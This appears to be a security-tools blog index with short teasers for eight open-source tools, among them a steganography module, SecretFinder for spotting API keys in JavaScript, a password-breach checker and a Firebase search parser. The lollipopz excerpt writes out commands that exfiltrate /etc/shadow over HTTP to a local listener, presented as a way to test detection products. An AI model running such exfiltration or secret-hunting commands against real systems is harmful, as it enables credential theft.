This Module will hide files inside images ( currenlty PNG ) and export the modified image to diskThe maximum size of file which can be hidden inside an image depends on the dimension of the image. max_file_size = ( height_of_image * width_of_image * 6 / 8 ) bytes ‘100k words.txt’ is hidden in ‘original_image.png’ namedRead More
A free and portable tool for controlling Windows 10’s many privacy-related settings and keep your personal data private. Your preparation for the Net!The Windows 10 default privacy settings leave a lot to be desired when it comes to protecting you and your private information. Whenever I set up a new computer or update a currentRead More
SecretFinder is a python script based on LinkFinder, written to discover sensitive data like apikeys, accesstoken, authorizations, jwt,..etc in JavaScript files. It does so by using jsbeautifier for python in combination with a fairly large regular expression. The regular expressions consists of four small regular expressions. These are responsible for finding and search anything onRead More
[*] A tool to assess data quality, built on top of the awesome OSSEM project. Mission Answer the question: I want to start hunting ATT&CK techniques, what log sources and events are more suitable? Create transparency on the strengths and weaknesses of your log sources Provide an easy way to evaluate your logs OSSEM Power-upRead More
Pwned is a simple command-line python script to check if you have a password that has been compromised in a data breach. This script uses haveibeenpwned API to check whether your passwords were leaked during one of the many breaches of online services.This API uses k-Anonymity model that allows a password to be searched forRead More
This tool is written in python2, the purpose of this tool is to parse all the results from Bing search.Basically whenever a firebaseio URL is found for an app , User instead of searching for sensitive data by going manually through the search results can use this tool.This tool works by using the given FirebaseRead More
Data exfiltration utility used for testing detection capabilities of security products. Obviously for legal purposes only.Exfiltration How-To /etc/shadow -> HTTP GET requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETServer -lp 80 -o output.log Client $ ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.GETClient -rh 127.0.0.1 -rp 80 -i ./samples/shadow.txt -r /etc/shadow -> HTTP POST requests Server # ./lollipopz-cli.py -m lollipopz.methods.http.param_cipher.POSTServer -lp 80Read More
nfstream is a Python package providing fast, flexible, and expressive data structures designed to make working with online or offline network data both easy and intuitive. It aims to be the fundamental high-level building block for doing practical, real world network data analysis in Python. Additionally, it has the broader goal of becoming a commonRead More
